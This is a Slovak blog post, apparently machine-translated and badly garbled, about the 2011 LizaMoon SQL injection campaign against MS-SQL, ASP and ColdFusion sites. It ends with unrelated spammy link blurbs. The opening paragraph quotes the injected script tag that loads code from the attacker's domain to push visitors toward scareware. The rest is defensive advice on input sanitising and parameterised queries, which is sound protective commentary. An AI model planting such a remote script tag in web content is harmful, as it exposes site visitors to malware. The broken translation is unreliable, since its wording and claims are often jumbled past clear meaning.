Veľká Lizamoon SQL Injection útok – Marec-apríl 2011



Dobre – Piatok veci začali začína byť zaujímavé na tech spravodajské weby. Väčšina stránok bola spustená falošné apríl oklame príbehy a niekoľko vrátane Websense bola bežiaci s veľkým útokom deje pred mnohými SQL založené na webových stránkach. Údaje boli povrchné – ľudí bolo povedané, hľadať ur.php súborov v adresári svojich webových (, Ktorá nie je práve dobrý test, či vaše stránky boli infikované týmto SQL injection…) “<script src = http://lizamoon.com / ur.php”> je príklad kódu, ktorý sa vkladá do databáz SQL a čo robí, je to v podstate núti návštevníkov k návšteve scareware miesto, kde malware môže byť nainštalovaný na svojom počítači, ktorý tvrdí, že majú vírus…. (koľko z tých, ktoré sme videli v poslednej 5-10 rokov?)

Jeden z mojich nepríjemností s tech novinky (a najmä vírus novinky) Pokrytie je, že keď príbeh dostane dostatočne veľká, aby boli pokryté veľkými médiami, nikdy to robiť spravodlivo. Chcem informácie o. Čo je to útok? Aké programy sú ohrozené, je tam vzor?


To je jedna z vecí, ktoré obťažoval ma o pokrytie tejto konkrétnej Beastie…. jo dobre, že je to SQL injection – je to mysql? MS-SQL? niektoré ďalšie zmes? Je to útok wordpress alebo Drupal alebo pohyblivý typ, alebo čo? Nie je veľa detailov sa nachádzalo. Tam bolo odporné nároky 4 miliónov infikovaných stránok (, Ktorý je silne prehnané.) Najlepší odhad videl som ich v 200,000+ rozsah. Vyhľadávanie Google ukázal, milióny stránok s podozrivým textu i keď to zahŕňalo viac stránok na webe a mnoho lokalít, ktoré boli jednoducho reportovať na exploitu.

So…. Sobotu som bol požiadaný o tom a ja som nebol schopný urobiť veľa výskumu. Tako, Som trochu výskum a zistil, že to vyzerá najviac postihnuté všetky stránky, ktoré boli identifikované Websense bol Microsoft SQL backend. V tú chvíľu som dych trochu jednoduchšie v tom, že nebudem naliehavo upgrade 50 alebo tak MySQL založil blog motory… V skutočnosti po prečítaní trochu ďalej som v podstate podal ho na víkend, keď som nič nasadenie, ktorá je závislá na MS-SQL.

Tak, dnes som si myslel, že tam musí byť nejaký vzor, ​​čo je zraniteľné…. Pri pohľade na google vyhľadávať , Ktorý ukazuje infikovaný reklama kódu….

Vidím. CFM na stranách, .asp, .aspx stránky, Našiel som stránku s tým poháňaných:

“Mango Blog – Blog ColdFusion motor”

Vidím niekoľko ďalších lokalít, ktoré sa zdajú byť poháňaný databázy, ale nie je jasné, aké stránky designu motora som sa lookiing. Naozaj spoločným menovateľom je asp / studená fúzie a microsofts rámca pre webové aplikácie.

Najlepšia rada, ktorá je vzhľadom k tomu, že by ste mali vždy filtrovať / dezinfikuje vstup do databáz. Inými slovami, neverím svojim návštevníkom dať do dobrých vecí vo formulároch. Verte im, aby sa pokúsila preniknúť do databázy pod pomocou znakov, ktoré sa chystáte dať nápovedu k databáze, že je čas, aby sme sa namiesto príkazu ošetrovanie vstup ako text.

Tam je dobrý článok o asp.net Prevencia SQL injection.

Je to naozaj pripomína tohto veľkého komiksu…. o malé Bobby tabuľky….

Toľko hovorí…. Zdá sa, že lepšie je poradiť paramaterize vaše SQL volania….

Dobrý tutoriál stránky o zabránení SQL injection problémy…

Mám podozrenie, existuje mnoho set vlastníkmi webov, ktoré ešte nie sú vedomí toho, že boli ohrozené.

Tak tu je flamebait – sú zlé kódovanie SQL praktizuje spoločný rys v prostredí Microsoft toolkit?

Pochybujem, že je to len otázkou nástrojov MS – aj šírenie “ľahko vytvoriť svoj vlastný databázy riadený stránky” nástrojov Zdá sa, že podporí návrh nedbalý. (Áno – Viem, že… založené na open source blogu motory mali svoj podiel na vstrekovacích problémov sql príliš….)

Takže je jednoduché pre každého, kto aby databáza riadené webové stránky neznamená, že všetci budú dodržiavať odporúčané postupy pre overovanie vstupu. (V skutočnosti vo väčšine vecí, ktoré som kedy videl – uľahčením Zdá sa, že podporí povrchnosti…)

Súvisiace príspevky

Blog Traffic Exchange Súvisiace príspevky
  • Pozor: Vlci vo oviec oblečenie nájsť na rôznych miestach (bezpečnostné podvody) To je ďalší "Vlk v oviec oblečenie" varovať. Blog Sunbelt má informácie a tipy na rade ďalších miest, ktoré sú pózuje buď ako Windows Security Center stránky, , Alebo stránka nebola nájdená chyba. Centrum zabezpečenia systému Windows spoof opäť tvrdí, že nasledujúce "Pozornosť! Váš systém ......
  • Viac informácií o zraniteľnosti Explorer Okrem iného ... Sans znížila infocon na zelenú, Nie, že hrozba je zmenšená, ale tam boli žiadne nové vývoj s ohľadom na oznámenia včera závažné chyby zabezpečenia programu Internet Explorer. Sans odporúča, prehliadanie webu s firefox (s noscript predĺženie, takže si môžete ......
  • Sklamanie trend pre on-line bankovníctvo stránky Vzhľadom k tomu, aké ľahké je pre ľudí, aby sa zmiasť tým, phishing stránky, by ste, že banky budú snažiť udržať čo najviac "jednoduché spôsoby, ako identifikovať legitímne bankový miesto" ako je to možné by nie? Mám na mysli, užívateľská prívetivosť je určite veľký predajné miesto vo veci softvéru a dokonca aj webové ......
Blog Traffic Exchange Súvisiace odkazy
  • Je prvej stránky H1 SEO stratégie Efektívne Pre užívateľov internetu a virtuálnej asistentov? Vysvetlenie virtuálnych asistentov na ceste písma je to veľkosť H1 môže byť súčasťou skvelej techniky SEO, pretože pavúky sa na kľúčové slová v tomto písma, ktoré sa výraznejšie. Skutočný výkon pri jazde väčšiu prevádzku na vašich webových stránkach sa nachádza v ......
  • V obrane vyslaných Vysielanie [/záhlavie] Blogeri by malo zahŕňať hosťa vysielanie ako príležitosť k rozšíreniu ich blog na pestrejší obsah a širší čitateľský. Zatiaľ čo niektorí blogeri považujú hosťa vysielanie ako príliš riskantné podniku od youâ € ™ re umožňuje cudzinec, aby ste mohli písať svoje názory na webe, Myslím, že riziko ......
  • Posilniť webové stránky Ranking v troch krokoch nekomplikovaných Podstatné stránky Zoznam je dôležité pre každého majiteľ malej firmy, špeciálne Online Business. Čím väčšia je vaša stránka má vysoké hodnotenie na Google úspechu, lepšiu návštevnosť webových stránok sa stáva. A všetci veríme, že viac návštevníkom zvyčajne znamená väčšie príjmy. Tak ako si na web skutočnosti boost ......
www.pdf24.org    Pošli článok ako PDF   

Podobné príspevky


Pozrite sa, čo sa stalo tento deň v histórii buď z BBC Wikipedia
Hľadať:
Kľúčové slová:
Amazon Logo

Komentáre sú uzavreté.


Prepnúť na našich mobilných stránok